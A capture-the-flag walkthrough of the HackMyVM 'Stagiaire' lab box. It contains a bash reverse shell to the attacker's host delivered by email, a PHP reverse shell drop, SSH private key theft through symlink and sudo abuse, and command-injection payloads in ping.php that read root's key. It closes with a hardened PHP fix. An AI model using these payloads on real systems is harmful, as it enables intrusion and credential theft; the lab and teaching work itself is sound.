HackMyVM - Stagiaire

 


More of a stagger through than a walkthrough :(

sudo netdiscover -r 10.0.0.0/24

Kali: 10.0.0.10
Stagiaire: 10.0.0.31

nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.31

# Nmap 7.91 scan initiated Mon Nov  8 10:16:41 2021 as: nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.31
Nmap scan report for 10.0.0.31
Host is up (0.00076s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
|   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.numericable.fr, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-23T15:24:56
|_Not valid after:  2031-10-21T15:24:56
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.51
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Protected area
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: 401 Unauthorized
Service Info: Hosts:  debian.numericable.fr, stagiaire.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 22 - SSH
Port 25 - SMTP
Port 80 - Web

The web seems to be protected with a username and password.

Hunting down usernames with VRFY on SMTP seems like a reasonable idea but apparently was actually not required.

Using name list from:
https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt


smtp-user-enum -M VRFY -U ./names.txt -t 10.0.0.31

So that's a start, we have root, madonna, tony.
After a long time, I have discovered that the website password is not in rockyou.txt and can be considered strong and unbreakable... so now what?

Time to rethink things.
GET is blocked, but what about POST?

┌──(kali㉿kali)-[~/stag]
└─$ curl http://10.0.0.31/index.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.51 (Debian) Server at 10.0.0.31 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/stag]
└─$ curl -X POST http://10.0.0.31/index.php
<img src="madonna.jpg" alt="">

At last something, even if it's only a jpg image.

┌──(kali㉿kali)-[~/stag]
└─$ curl -X POST http://10.0.0.31/madonna.jpg --output madonna.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  127k  100  127k    0     0  15.5M      0 --:--:-- --:--:-- --:--:-- 15.5M

┌──(kali㉿kali)-[~/stag]
└─$ stegseek madonna.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "freeze"
[i] Original filename: "info.txt".
[i] Extracting to "madonna.jpg.out".

┌──(kali㉿kali)-[~/stag]
└─$ cat madonna.jpg.out
Don't waste your time I hate CTFs lol

┌──(kali㉿kali)-[~/stag]
└─$ curl -X POST http://10.0.0.31/info.txt
/madonnasecretlife

Got an image and it's got some extra secrets to point the way forward.
stegseek extracts a text file, but the website has different content under the same filename.

WordPress...

After scanning and looking for any exploits, hidden files or other bits I had to resort to reading the message that was clearly written on the page that tells you what to do next!
Checking mail every minute sounds like it may be automated...



on Kali:
Create a reverse shell payload and host it

└─$ cat rs.html
bash -i >& /dev/tcp/10.0.0.10/4444 0>&1
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Set a listener in another shell:
└─$ nc -nvlp 4444    
listening on [any] 4444 ...

In yet another shell send a mail (quicker to just use telnet than remember any clever commands):
└─$ telnet 10.0.0.31 25  
Trying 10.0.0.31...
Connected to 10.0.0.31.
Escape character is '^]'.
220 debian.numericable.fr ESMTP Postfix (Debian/GNU)
mail from: kali@kalibox.com
250 2.1.0 Ok
rcpt to: madonna@stagiaire.hmv                       
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: do you open a mail and run it
http://10.0.0.10:8000/rs.html


.
250 2.0.0 Ok: queued as 04CFB618EC

Bingo !


Now there is a .ssh folder with keys, so cat, copy and paste to Kali and I can have a proper shell!

Escalate to Paillette

User paillette's home directory has a tetramin folder in it and www-data has group access.
There is a writable folder in /var/www/html/labs.
Seems like a good place to put a reverse shell:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
copied and pasted to the server through the shell.
madonna can write a file there and then send a curl -X POST command to initiate it back to Kali.

Using the www-data reverse shell:
cd to /home/paillette/tetramin.
There is an ssh folder with an id_rsa file but no rights to it, but there is a .chmod file in the home directory, so
create a symlink in the tetramin folder to the key file.
ln -s ssh/id_rsa
Before I could try running the .chmod file the permissions just changed... seems to be on a cron job as Paillette and we can just read the file after a minute anyway!

$ ls -al
total 12
drwxrwxrwx 2 paillette paillette 4096 Oct 28 20:23 .
drwxrwx--- 3 paillette www-data  4096 Nov 11 12:36 ..
-rwxrwxrwx 1 paillette paillette 2610 Oct 28 20:22 id_rsa
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----

ssh in as paillette

paillette@stagiaire:~$ sudo -l
Matching Defaults entries for paillette on stagiaire:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paillette may run the following commands on stagiaire:
    (tony) NOPASSWD: /usr/bin/compose

As I seem to be on a roll with id_rsa files, let's try something simple...

paillette@stagiaire:~$ sudo -u tony /usr/bin/compose norun /home/tony/.ssh/id_rsa

The ssh key opened in vim; select all, copy and paste into a file on Kali,
chmod 600 and ssh in as tony.


tony@stagiaire:~$ sudo -l
Matching Defaults entries for tony on stagiaire:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tony may run the following commands on stagiaire:
    (ALL : ALL) NOPASSWD: /bin/bash /srv/php_server
tony@stagiaire:~$ cat /srv/php_server
/usr/bin/php -S 127.0.0.1:8000 -t /opt

Can't access /opt to see what is there :(
127.0.0.1:8000 isn't very friendly :(
Let's try and just run it as a user on its LAN IP and scan it from Kali:
/usr/bin/php -S 10.0.0.31:8000 -t /opt

┌──(kali㉿kali)-[~/stag]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -r -u http://10.0.0.31:8000/ -x php -o phpdev --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.31:8000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/11/11 07:08:59 Starting gobuster in directory enumeration mode
===============================================================
/ping.php             (Status: 200) [Size: 0]

Now we have an endpoint, and need to fuzz the query string / parameter name:
┌──(kali㉿kali)-[~/stag]
└─$ wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hh BBB  http://10.0.0.31:8000/ping.php?FUZZ{test}=10.0.0.10
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.0.0.31:8000/ping.php?FUZZ=10.0.0.10
Total requests: 87664

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                             
=====================================================================

000000001:   200        0 L      0 W        0 Ch        "test"                                                                                                                              
000000939:   200        10 L     60 W       437 Ch      "ip"  

OK
So a bit of playing and we have a possible way in:
└─$ curl http://10.0.0.31:8000/ping.php?ip=10.0.0.10
<pre>PING 10.0.0.10 (10.0.0.10) 56(84) bytes of data.
64 bytes from 10.0.0.10: icmp_seq=1 ttl=64 time=0.313 ms
64 bytes from 10.0.0.10: icmp_seq=2 ttl=64 time=0.505 ms
64 bytes from 10.0.0.10: icmp_seq=3 ttl=64 time=0.440 ms
64 bytes from 10.0.0.10: icmp_seq=4 ttl=64 time=0.427 ms

--- 10.0.0.10 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3055ms
rtt min/avg/max/mdev = 0.313/0.421/0.505/0.069 ms
</pre>
                              
┌──(kali㉿kali)-[~/stag]
└─$ curl "http://10.0.0.31:8000/ping.php?ip=10.0.0.10|id"
<pre>uid=1001(tony) gid=1001(tony) groups=1001(tony)
</pre>

So now I can run it with sudo and see if I can get a shell or find any ssh keys.
<much playing later>
tony@stagiaire:~$ curl -G --data-urlencode 'ip=10.0.0.1;ls /root/.ssh/' http://127.0.0.1:8000/ping.php
<pre>PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=255 time=0.213 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=255 time=0.316 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=255 time=0.329 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=255 time=0.314 ms

--- 10.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3074ms
rtt min/avg/max/mdev = 0.213/0.293/0.329/0.046 ms
authorized_keys
id_rsa
known_hosts
</pre>

tony@stagiaire:~$ curl -G --data-urlencode 'ip=10.0.0.1;cat /root/.ssh/id_rsa' http://127.0.0.1:8000/ping.php
<pre>PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=255 time=0.268 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=255 time=0.318 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=255 time=0.346 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=255 time=0.347 ms

--- 10.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3049ms
rtt min/avg/max/mdev = 0.268/0.319/0.347/0.032 ms
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuaYh3JOr8cObrWXSTcuGLuJ/KmfvUBuy3NXDCXnlL2EPXmbK9uS6
TpAbQOr0G0jPswcQfs5/xpYTPzaQY69Va9G+0tnair+0ZxYNRUKBGE+wu+AqNRnwhTh0bH

got the root ssh key so just copy, paste, chmod 600 and connect.
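The root of the box's problem is that ping.php hands whatever arrives in the ip parameter to a shell, which is why "|id" and ";cat /root/.ssh/id_rsa" run, and the NOPASSWD sudo rule means they run as root. The following is an added example, not the box's own ping.php (the page never shows its source): the pattern its behaviour implies, next to a hardened version that allow-lists a literal IP address and quotes the argument.

```php
<?php
// Added example, not the Stagiaire box's ping.php (its source is not on the page).
// The behaviour seen above implies something like this, which is the bug:
//
//   echo '<pre>' . shell_exec('ping -c 4 ' . $_GET['ip']) . '</pre>';
//
// /bin/sh parses the concatenated string, so "10.0.0.10|id" runs id, and when
// the server is started through the NOPASSWD sudo rule, it runs as root.

declare(strict_types=1);

/** Return the address only if it is a syntactically valid IPv4/IPv6 literal, else null. */
function validate_ping_target(string $raw): ?string
{
    // FILTER_VALIDATE_IP rejects hostnames, whitespace and every shell
    // metacharacter: a valid IP literal only contains digits, dots, hex and colons.
    $ip = filter_var(trim($raw), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

/** Build the ping command for an already-validated address. */
function build_ping_command(string $ip): string
{
    // escapeshellarg() is defence in depth: even if validation were relaxed,
    // the value reaches the shell as one quoted word, never as an operator.
    return 'ping -c 4 -W 2 ' . escapeshellarg($ip);
}

$target = validate_ping_target($_GET['ip'] ?? '');
if ($target === null) {
    http_response_code(400);
    exit("Bad request: ip must be an IP address\n");
}

header('Content-Type: text/plain; charset=utf-8');
$output = shell_exec(build_ping_command($target));
echo ($output === null || $output === false) ? "ping failed\n" : $output;
```

Even with the input fixed, the server should run as an unprivileged account rather than through a root NOPASSWD rule, so a bug in a page under /opt cannot hand out root's keys.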
